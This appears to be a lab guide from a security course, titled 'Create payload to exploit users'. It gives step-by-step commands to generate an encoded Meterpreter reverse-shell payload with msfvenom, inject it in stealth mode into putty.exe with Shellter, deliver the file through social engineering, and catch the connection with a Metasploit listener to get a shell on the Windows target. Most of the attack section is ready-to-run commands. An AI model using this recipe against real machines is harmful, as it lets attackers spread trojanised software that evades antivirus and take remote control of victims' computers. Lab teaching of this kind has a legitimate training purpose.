search

Create payload to exploit users

Note 1: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Note 2: these labs can only be executed on an Intel architecture - for instance, they will not work on the new Apple Silicon Macs (M1, M2, ...).

hashtag
Requirements

Kali Linux
The Kali Linux VM (or any other type of installation)

Windows 7

The Windows 7 VM

Metasploitable Framework

Metasploit Framework toolset (installed on Kali Linux by default)

Shellter

You need to have the Shellter tool installed. Shellter is a dynamic shellcode injection tool used to inject exploits and Shellcode into native Windows applications.

Windows 7 IP

The IP address of the Windows 7 VM. In my case it is 192.168.8.130. This may be different in your specific case.

Kali Linux IP

The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.

hashtag
Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

hashtag
Install Shellter

To install Shellter on Kali Linux, follow these steps (this process may take some time):

sudo apt update

sudo apt install shellter

sudo dpkg --add-architecture i386

sudo apt update

sudo apt -y install wine32

hashtag
Produce the “malicious” payload with Metasploit

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.147 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw -o /home/kali/Desktop/PhotoEditor.raw

(note that LHOST and LPORT refer to the Kali Linux machine)

hashtag
Download an executable application

This executable application will carry the “malicious” payload. We are going to use putty.exearrow-up-right. (32 bit version)

hashtag
Inject Encoded Payload into Putty With Shellter

This will inject our Metasploit generated payload into the putty.exe application.

hashtag
Run Shellter

shellter

Select the Auto operation: A

Select the PE Target: location of putty.exe that was downloaded.

Wait… this takes time!

Select Enable Stealth Mode = Y

Use a custom payload = C

Select the location of the payload that was previously created with Metasploit (/home/kali/Desktop/PhotoEditor.raw).

Answer that this is not a reflective DLL loader, choosing the option N.

Wait until the end of the process!

You now have a putty.exe file properly injected with the payload.

Now you have to copy the putty.exe to the Windows machine. This is the part where some attacker would have to do some social engineering.

hashtag
Create a Metasploit reverse listener

This process will create on Metasploit a reverse TCP listener that will sit and wait for remote connections - hopefully from our “malicious” payload.

hashtag
Start Metasploit

msfconsole

hashtag
Select the module

use exploit/multi/handler

options

hashtag
Select the payload

set PAYLOAD windows/meterpreter/reverse_tcp

hashtag
Set the options for payload

options

set LHOST 192.168.8.147

set LPORT 4444

options

hashtag
Run this exploit

exploit

Now simply wait for connections…

hashtag
Run “putty.exe”

Go back to the Windows machine and run the “putty.exe” command.

hashtag
Back to Metasploit

Now look at your Metasploit window… looks like we have a connection.

hashtag
Interact with meterpreter

shell

hashtag
Questions

Now that you have completed this exploitation try to answer to following:

  1. Now, what can I do with the exploitation achieved?

  2. Which type of privileges do I have on the exploited target?

  3. How was this accomplished?

PreviousWindows Eternalblue [CVE-2017-143,144,145,146,148]NextApplication Security

Last updated